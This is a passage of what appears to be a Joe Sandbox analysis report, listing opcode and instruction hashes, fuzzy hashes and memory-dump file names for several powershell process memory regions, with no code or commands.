• Opcode Fuzzy Hash: 06c03920724274fe04f62db62e38785c7e8c31f5fc5e2e357b52bddea041b5a9
• Instruction Fuzzy Hash: 88F0AF20A0D3C55FE34A977898696A63FE1AF83750F1801EEE1CAC61B3CA681845C702
Memory Dump Source
• Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 49b8c71f2706ef05dc0605fa3c536647985570c7783739308d3f813d2551d547
• Instruction ID: ed82d378bf8b0c629ba21ebc377bb143a71d1a8c922c60bf5c88abb6e4132268
• Opcode Fuzzy Hash: 49b8c71f2706ef05dc0605fa3c536647985570c7783739308d3f813d2551d547
• Instruction Fuzzy Hash: ED429053E0E6D21FE753566958F61F57FA0EF23265B0900F7C6D9CA0E3D90CA80AA352
Memory Dump Source
• Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57414d0121cbc5edff91a63528da1295e949698ba332d126ffe937767348a304
• Instruction ID: 408bb023d4a33d0fba420f058f26a0e1a22f0e73bbc8bfc1af7fe23b2ee1c4be
• Opcode Fuzzy Hash: 57414d0121cbc5edff91a63528da1295e949698ba332d126ffe937767348a304
• Instruction Fuzzy Hash: 75716487F0F6C21EE763566828F54F92FA0DF5322570902F7D6DEC60A3DD0DA406A262
Memory Dump Source
• Source File: 00000003.00000002.2209492221.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd34610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6689a01889d379629f197c6fb487dba2f8f686835b05f96cc75d1dea8de54cf
• Instruction ID: 07374f8dafb72f5fb6f9e14fa4602f55c69b3e60d40f8d4c4daa254124ab8b19
• Opcode Fuzzy Hash: f6689a01889d379629f197c6fb487dba2f8f686835b05f96cc75d1dea8de54cf
• Instruction Fuzzy Hash: F2110631B0D7C98FEB55DE9880A41B87BD2EF4A310B0400BFC54DCB183DE28A881D311
Memory Dump Source
• Source File: 00000003.00000002.2209106562.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffd34540000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction ID: 5d7fcb5bbf17594a2fd62b4d39bec78ad26d850823527c364f545537ea33e4f1
• Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: 5001677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665DB36E882CB45